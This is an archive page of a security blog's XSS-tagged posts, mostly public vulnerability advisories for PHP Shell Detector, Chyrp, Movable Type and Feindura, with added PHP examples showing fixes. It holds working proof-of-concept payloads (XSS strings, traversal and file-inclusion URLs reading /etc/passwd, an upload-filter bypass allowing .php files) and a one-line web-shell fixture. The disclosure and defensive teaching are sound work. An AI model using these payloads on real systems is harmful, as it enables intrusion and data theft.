Results tagged “xss” from Just Another Hacker

--------------------------------------------------------------------------------------------
20120831 - Justanotherhacker.com : PHP Shell Detector - Cross site scripting
JAHx121 - http://www.justanotherhacker.com/advisories/JAHx121.txt
--------------------------------------------------------------------------------------------

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main feature is that if you're not sure about a suspicious file, you may send
it to the websecure.co.il team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: http://www.emposha.com/security/php-shell-detector-web-shell-detection-tool.html ]


--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha - http://www.emposha.com/
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file that the PSD signatures already detect, i.e. rename it so that the
filename carries the payload:
root@localhost:~# mv htaccess.php \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file; the filename is written into the results page
without encoding.
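The scenario behind this advisory, as an added example that is not PHP Shell Detector's code: a scanner whose report prints the names of flagged files, once the vulnerable way and once with the names HTML-encoded. The signature list, the temporary directory and the planted file are constructed for the demonstration.

```php
<?php
// Added example, not PHP Shell Detector's code: a scanner report that treats
// filenames found on disk as untrusted input. An attacker who can drop a file
// (the scenario PSD exists for) also controls the name that ends up in the
// HTML report, so the report has to HTML-encode every name it prints.

declare(strict_types=1);

// Hypothetical signature list; a real scanner has a database of these.
const SUSPICIOUS_PATTERNS = ['eval(base64_decode(', 'passthru(', 'shell_exec('];

function is_suspicious(string $contents): bool {
    foreach (SUSPICIOUS_PATTERNS as $needle) {
        if (strpos($contents, $needle) !== false) {
            return true;
        }
    }
    return false;
}

// Vulnerable rendering: the filename is concatenated straight into markup, so
// a name such as "<img src=x onerror=alert(1)>.txt" becomes live HTML.
function render_row_unsafe(string $name): string {
    return "<tr><td>$name</td></tr>";
}

// Hardened rendering: encode for the HTML element context. ENT_QUOTES also
// covers attribute contexts; naming the charset avoids encoding-dependent bypasses.
function render_row_safe(string $name): string {
    return '<tr><td>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td></tr>';
}

// Scan a directory and build the report. Only the basename is printed, but
// basename()/getFilename() are not sanitisers: they leave < > " ' untouched.
function scan_report(string $dir, bool $safe = true): string {
    $rows = '';
    foreach (new DirectoryIterator($dir) as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $contents = file_get_contents($entry->getPathname());
        if ($contents === false || !is_suspicious($contents)) {
            continue;
        }
        $rows .= $safe ? render_row_safe($entry->getFilename())
                       : render_row_unsafe($entry->getFilename());
    }
    return "<table>$rows</table>\n";
}

// Constructed fixture: a temporary directory holding one "shell" whose
// filename is the payload from the advisory's PoC.
$dir = sys_get_temp_dir() . '/psd-demo-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$payloadName = '<img src=x onerror=alert(1)>.txt';
file_put_contents("$dir/$payloadName", '<?php eval(base64_decode($_POST["c"])); ?>');

echo "unsafe: ", scan_report($dir, false);   // payload reaches the page as markup
echo "safe:   ", scan_report($dir, true);    // payload reaches the page as text

unlink("$dir/$payloadName");
rmdir($dir);
```

The point to carry away is that a filesystem is just another input channel: a scanner for attacker-planted files must assume the attacker also chose the names, the sizes and the timestamps it displays.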

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilities
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern.
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php XSS can also be reached through the rewrite rules using the following query string:
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialised in the admin/help.php file, resulting in cross site
scripting if register_globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a PHP gotcha: strpos() returns the integer offset of a match, and a match at offset 0 is the
integer 0, which is falsy. A check that tests the return value directly in an if statement, instead of
comparing it with === false, therefore treats a match at the start of the string as no match, a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php
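The PHP behaviour behind the gz.php bug, and the check that replaces substring matching, as an added example that is not Chyrp's code. The buggy guard is a hypothetical reconstruction of the bug class, not the vendor's actual code; the base directory, theme file and request list are constructed for the demonstration. The same containment check is what the Feindura download.php and filemanager issues further down this page are missing.

```php
<?php
// Added example, not Chyrp's gz.php. Part 1 reproduces the PHP behaviour the
// advisory describes with a hypothetical guard (a reconstruction of the bug
// class, not the vendor's code). Part 2 is a containment check that does not
// rely on substring matching at all.

declare(strict_types=1);

// Part 1: strpos() returns the integer offset of the match, and the integer 0
// is falsy. This guard "works" on every path except the one where the
// forbidden sequence is the very first thing in the string.
function looks_safe_buggy(string $path): bool {
    if (strpos($path, '..')) {          // a match at offset 0 is treated as no match
        return false;
    }
    return true;
}

function looks_safe_fixed(string $path): bool {
    return strpos($path, '..') === false;   // strict comparison against false
}

// Part 2: resolve the request under a fixed base directory and check that the
// canonical path is still inside it. realpath() collapses "..", symlinks and
// duplicate slashes, so no substring rule is needed. PHP before 5.3.4
// truncated paths at a NUL byte (which the %00 PoCs on this page rely on), so
// NUL is rejected explicitly as well.
function resolve_under(string $base, string $userPath): ?string {
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . ltrim($userPath, '/'));
    if ($baseReal === false || $target === false) {
        return null;                                 // base missing or file does not exist
    }
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                                 // canonical path escaped the base
    }
    return $target;
}

// Constructed fixture: a temporary base directory holding one theme file.
$base = sys_get_temp_dir() . '/chyrp-demo-' . bin2hex(random_bytes(4));
mkdir("$base/themes", 0700, true);
file_put_contents("$base/themes/style.css", "body { color: #000; }");

$requests = [
    '../../etc/passwd',                              // ".." at offset 0: fools the buggy guard
    '/themes/style.css',                             // legitimate request
    '/themes/../../../../../../etc/passwd',          // the advisory's traversal shape
    "/themes/style.css\0.gz",                        // NUL-byte truncation attempt
];
foreach ($requests as $req) {
    printf("%-42s buggy=%-5s fixed=%-5s resolved=%s\n",
        addcslashes($req, "\0"),
        looks_safe_buggy($req) ? 'pass' : 'block',
        looks_safe_fixed($req) ? 'pass' : 'block',
        resolve_under($base, $req) ?? 'refused');
}

unlink("$base/themes/style.css");
rmdir("$base/themes");
rmdir($base);
```

realpath() needs the target to exist, which is exactly the case for a script that is about to serve it; the prefix comparison is done on the canonical form of both sides so that a symlinked temp directory or a trailing slash in the configured base does not produce false refusals.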


--- Arbitrary file upload ---
Authorised users can upload arbitrary files in Chyrp versions <= 2.0 when the swfupload extension and the
file upload feathers are enabled. The permitted file extensions are restricted only in client-side JavaScript
(the SWFUpload file_types list), not by the upload handler. Modify the JavaScript in the page using Firebug
or an intercepting proxy to allow *.php uploads. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php also works, but changing the JavaScript is far easier.

PoC:
Appended ;*.php to the file_types list in the script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using an intercepting proxy:
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
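The server-side check that makes the client-side file_types list irrelevant, as an added example that is not Chyrp's upload_handler.php. The allowlists, the 1x1 PNG and the PHP source saved under image names are constructed for the demonstration.

```php
<?php
// Added example, not Chyrp's upload_handler.php. The SWFUpload file_types list
// in the PoC above is enforced only in the browser, so the server must repeat
// the check independently of anything the client sent: the name, the content
// and the name used on disk are all decided here.

declare(strict_types=1);

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];
const ALLOWED_MIME       = ['image/jpeg', 'image/png', 'image/gif'];

// Decide whether one uploaded file may be stored. Returns [true, storage name]
// or [false, reason]. $clientName is the name the browser sent; $tmpPath is
// the temporary file PHP wrote ($_FILES[...]['tmp_name'] in a real handler).
function validate_upload(string $clientName, string $tmpPath): array {
    // 1. Extension: only the LAST one counts ("x.jpg.php" is a .php file),
    //    compared case-insensitively against an allowlist, never a denylist.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return [false, "extension '$ext' not allowed"];
    }

    // 2. Content: sniff the bytes with libmagic rather than trusting
    //    $_FILES[...]['type'], which is also supplied by the client.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return [false, "content type '$mime' is not an allowed image type"];
    }

    // 3. Belt and braces: PHP's own image parser must accept the header too.
    //    Neither check proves the file is harmless (image/PHP polyglots exist),
    //    which is why step 4 and a no-script-execution upload directory matter.
    if (@getimagesize($tmpPath) === false) {
        return [false, 'image header does not parse'];
    }

    // 4. Never reuse the client's name on disk: a random name with the
    //    validated extension defeats double-extension and path tricks.
    return [true, bin2hex(random_bytes(16)) . '.' . $ext];
}

// Constructed fixtures: a real 1x1 PNG, and PHP source saved under image names.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$tmpImage = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmpImage, $png);
$tmpShell = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmpShell, "<?php system(\$_GET['c']); ?>");

foreach ([['photo.PNG', $tmpImage], ['shell.php', $tmpShell],
          ['shell.png', $tmpShell], ['shell.php.png', $tmpShell]] as [$name, $path]) {
    [$ok, $detail] = validate_upload($name, $path);
    printf("%-14s %s %s\n", $name, $ok ? 'ACCEPT' : 'REJECT', $detail);
}

unlink($tmpImage);
unlink($tmpShell);
```

Store the accepted file outside the document root, or in a directory where the web server has PHP execution disabled; with Apache's AddHandler configuration a name such as shell.php.png can otherwise still be executed, which is the second reason step 4 generates the name server-side.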

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20110525 - Justanotherhacker.com : Cross site scripting in Movable Type
JAHx112 - http://www.justanotherhacker.com/advisories/JAHx112.txt
--------------------------------------------------------------------------------------------

Movable Type is a professional publishing platform
[ Taken from: http://www.movabletype.org ]


--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd - http://www.sixapart.com
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x


--- Proof of Concept ---
http://vuln.com/cgi-bin/mt-comment.cgi?__mode=handle_sign_in&static="><script>alert(document.cookie)</script>&logout=1&entry_id=
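What a fixed comment script does with the static parameter, as an added example that is not Movable Type's code: first validate that the value is a same-site URL (SITE_HOST is an assumed host name), then encode it for the attribute context in which the meta refresh embeds it. The inputs at the bottom are constructed.

```php
<?php
// Added example, not Movable Type's code. A sign-in/logout handler that sends
// the visitor back where they came from via a <meta> refresh, which is the
// pattern the advisory describes. Two defences, both needed: (1) accept only a
// relative path or a URL on our own host, so the parameter cannot become an
// open redirect; (2) encode the value for the HTML attribute context, so a
// quote in the parameter cannot close the attribute or the tag.

declare(strict_types=1);

const SITE_HOST = 'blog.example.org';   // assumed host name of the installation

// Returns a redirect target that is safe to embed, or '/' when the supplied
// value is not a same-site URL.
function safe_redirect_target(?string $candidate): string {
    if ($candidate === null || $candidate === '' || strpbrk($candidate, "\r\n\0") !== false) {
        return '/';
    }
    $parts = parse_url($candidate);
    if ($parts === false) {
        return '/';
    }
    // Absolute URL: must be http(s) on our own host. Userinfo tricks such as
    // https://blog.example.org@attacker.example/ parse with host=attacker.example.
    if (isset($parts['scheme']) || isset($parts['host'])) {
        $scheme = strtolower($parts['scheme'] ?? '');
        if (!in_array($scheme, ['http', 'https'], true)) {
            return '/';
        }
        if (strtolower($parts['host'] ?? '') !== SITE_HOST) {
            return '/';
        }
        return $candidate;
    }
    // Relative: require a leading slash that is not followed by another slash
    // or a backslash, since browsers treat // and /\ as scheme-relative.
    if (preg_match('#^/(?![/\\\\])#', $candidate) !== 1) {
        return '/';
    }
    return $candidate;
}

// The <meta> tag is built only from the validated value, and that value is
// encoded for the attribute context (ENT_QUOTES escapes both " and ').
function meta_refresh_html(?string $static): string {
    $target  = safe_redirect_target($static);
    $encoded = htmlspecialchars($target, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<meta http-equiv="refresh" content="0;url=' . $encoded . '">';
}

// Constructed inputs: the advisory's payload, redirect tricks, and two legitimate values.
$inputs = [
    'advisory payload'   => '"><script>alert(document.cookie)</script>',
    'off-site absolute'  => 'https://attacker.example/phish',
    'protocol-relative'  => '//attacker.example/phish',
    'userinfo trick'     => 'https://blog.example.org@attacker.example/',
    'same-site absolute' => 'https://blog.example.org/2011/05/post.html',
    'same-site relative' => '/2011/05/post.html#comments',
];
foreach ($inputs as $label => $in) {
    printf("%-20s %s\n", $label, meta_refresh_html($in));
}
```

Validation and encoding are separate controls: encoding alone stops the script injection but leaves an open redirect to any URL, while validation alone stops the redirect but still lets a quote break out of the attribute. A Location header instead of the meta refresh needs the same validation, and the CR/LF check at the top then guards against header injection as well.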


--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36 (with Professional Pack, Community Pack)
* Movable Type 5.05 (with Professional Pack, Community Pack)
* Movable Type 5.1 (with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

Verisign is proactive about xss

I found this a while back, and when I went to inform Verisign, the hole had been closed. It's good to see that someone takes log analysis seriously.
[Screenshot: verisign-seal-xss.PNG]

--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is an Open Source flat-file based Content Management System for Web Designers,
written in PHP. There is no need for a database and it's easy to integrate into your websites.
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS suffers from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable is assigned directly from user input and later used, unencoded, in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions to the filename parameter, which allows arbitrary file reads (the value is passed to readfile(), so this is a file disclosure rather than a code-executing include).
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x & 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions to the path parameter, which allows arbitrary file reads (again via readfile(), so file disclosure rather than inclusion).
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
The language selection code does not sufficiently filter the supplied variable, resulting in arbitrary file reads and code execution, since the value ends up in an include() call.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00
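Keeping user input out of include() altogether, as an added example that is not Feindura's backend.include.php: the requested language is a key looked up in an allowlist built from the files on disk, and only the mapped path is ever included. The language directory and its two files are constructed fixtures in a temporary location.

```php
<?php
// Added example, not Feindura's backend.include.php. The vulnerable code on
// this page copies $_GET['language'] into the session and builds an include()
// path from it. The fix is to keep user input out of include() entirely:
// resolve a short identifier against an allowlist built from the files we
// ship, and include the mapped path. The download.php issue above has the
// same shape: look the requested name up in what is actually offered.

declare(strict_types=1);

// Constructed fixture directory for the demonstration (assumed location).
define('LANG_DIR', sys_get_temp_dir() . '/feindura-demo-' . bin2hex(random_bytes(4)) . '/lang');

// Build the allowlist from disk, once per request. Keys are the identifiers a
// user may send; values are absolute paths chosen by us, never by the user.
function available_languages(): array {
    $langs = [];
    foreach (glob(LANG_DIR . '/*.backend.php') ?: [] as $file) {
        $id = basename($file, '.backend.php');
        if (preg_match('/^[a-z]{2}(_[a-z]{2})?$/', $id) === 1) {   // "en", "de", "pt_br"
            $langs[$id] = $file;
        }
    }
    return $langs;
}

// Map the untrusted value to a known file or fall back to the default. No
// attempt is made to "clean" the string: traversal sequences, NUL bytes and
// case variations are simply not keys in the map.
function language_file(?string $requested, string $default = 'en'): string {
    $langs = available_languages();
    if ($requested !== null && isset($langs[$requested])) {
        return $langs[$requested];
    }
    if (!isset($langs[$default])) {
        throw new RuntimeException("default language '$default' is not installed");
    }
    return $langs[$default];
}

// The language files return an array of UI strings, as the original's
// "$langFile = include(...)" suggests.
function load_language(?string $requested): array {
    return include language_file($requested);
}

// Constructed fixture: two language files.
mkdir(LANG_DIR, 0700, true);
file_put_contents(LANG_DIR . '/en.backend.php', '<?php return ["SAVE" => "Save"];');
file_put_contents(LANG_DIR . '/de.backend.php', '<?php return ["SAVE" => "Speichern"];');

$requests = [
    'de',                                            // installed language
    "../../../../../../../etc/passwd\0",             // the advisory's payload: not a key
    'DE',                                            // case variation: not a key
    null,                                            // nothing requested: default
];
foreach ($requests as $req) {
    printf("%-36s -> %s\n", addcslashes((string) $req, "\0"), load_language($req)['SAVE']);
}

unlink(LANG_DIR . '/en.backend.php');
unlink(LANG_DIR . '/de.backend.php');
rmdir(LANG_DIR);
rmdir(dirname(LANG_DIR));
```

Because the session value in the original persists, a fix also has to validate at the point of use, not only when $_GET['language'] is first stored; looking the value up on every request, as above, covers both.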

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Custom graudit signatures

Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation, and signatures are just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming RSS readers.

In the spirit of openness the Apache Software Foundation has released an excellent post-mortem write-up of their recent compromise. It started with an XSS attack leveraged through the issue tracking software they use (JIRA) and ended with complete root access on one server, limited access to another and a number of passwords compromised.

Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010
Robert Hansen is at it again. This time he has produced a very simple exploit that will steal passwords that are stored (remembered) in the browser. The code is very simple and works a treat for Firefox.

I would recommend this over the usual XSS alert boxes the next time you are demoing cross site scripting. Try it out at http://ha.ckers.org/weird/xss-password-manager.html. I haven't tried it in any browsers besides Firefox, but even if you can't read it straight out of the DOM, you could always rewrite the form action URL or even hook the onsubmit call to send the username and password to a destination of your choosing.
Unless you're living under a rock, you should have heard of the Common Weakness Enumeration (CWE)/SANS top 25 list. The second annual list was released some time ago and is always worth a read. The guys over at the Application Security Street Fighter blog are honouring this year's list with a run-down of the vulnerabilities and applicable solutions. As usual it's a no-nonsense approach to describing the problem and solutions without going too far in depth. I would recommend this blog to any developer, so go have a read...right now :) Number one on the list is cross site scripting (XSS).

http://blogs.sans.org/appsecstreetfighter/

XSS in whois

Like many other text-only protocols, whois is a place where XSS is often overlooked. The rationale behind this is simple: browsers aren't meant to query whois information. I have suspected that it's been possible for some time, but it wasn't until I did a whois on a domain registered through privacy--protect.com that I saw it in the wild for the first time.

$ whois anireactor.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: ANIREACTOR.COM
   Registrar: HEBEI INTERNATIONAL TRADING ( SHANGHAI) CO., LTD
   Whois Server: whois.hebeidomains.com
   Referral URL: http://www.hebeidomains.com
   Name Server: NS1.ISAACHOST.COM
   Name Server: NS2.ISAACHOST.COM
   Status: clientTransferProhibited
   Updated Date: 09-jan-2010
   Creation Date: 09-jan-2010
   Expiration Date: 09-jan-2011

>>> Last update of whois database: Thu, 28 Jan 2010 05:59:01 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domainname: ANIREACTOR.COM

Registrant:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org

Administrative:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org

Technical:
   ANIREACTOR.COM
   Privacy--Protect.org
   P.O. Box 98
   Note - All Postal Mails Rejected, visit Privacy--Protect.org
   5066 Moergestel
   The Netherlands
   Tel.: +55.1137117371
   Email: ANIREACTOR.COM (at) privacy--protect.org


Legal note:
PRIVACY--PROTECT.ORG is providing privacy protection services to
this domain name to protect the owner from spam and phishing attacks.
Privacy--Protect.org is not responsible for any of the activities
associated with this domain name. If you wish to report any abuse
concerning the usage of this domain name, you may do so at
http://privacy--protect.org/. We have a stringent abuse policy and
any complaint will be actioned within a short period of time.
<script>open('http://privacy--protect.org/');</script>

The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about
or related to a domain name registration record. We make this information
available "as is", and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress
or load this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail,
or by telephone.

The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar
of record is HebeiDomains.com. We reserve the right to modify these terms
at any time. By submitting this query, you agree to abide by these terms.


Request number 1 from 5 daily allowed from your IP address.
